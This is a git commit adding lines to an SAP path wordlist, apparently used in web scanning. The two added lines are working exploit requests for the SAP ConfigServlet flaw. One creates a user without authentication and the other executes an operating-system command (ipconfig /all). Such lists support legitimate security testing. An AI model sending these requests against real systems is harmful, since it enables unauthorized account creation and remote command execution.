Update sap.txt
adding SAP ConfigServlet Remote Unauthenticated Payload Execution
This commit is contained in:
@@ -92,6 +92,8 @@ caf
|
|||||||
ccsui
|
ccsui
|
||||||
com~tc~lm~webadmin~httpprovider~web
|
com~tc~lm~webadmin~httpprovider~web
|
||||||
ctc
|
ctc
|
||||||
|
ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
|
||||||
|
ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
|
||||||
dispatcher
|
dispatcher
|
||||||
dswsbobje
|
dswsbobje
|
||||||
dtr_lite
|
dtr_lite
|
||||||
|
|||||||
Reference in New Issue
Block a user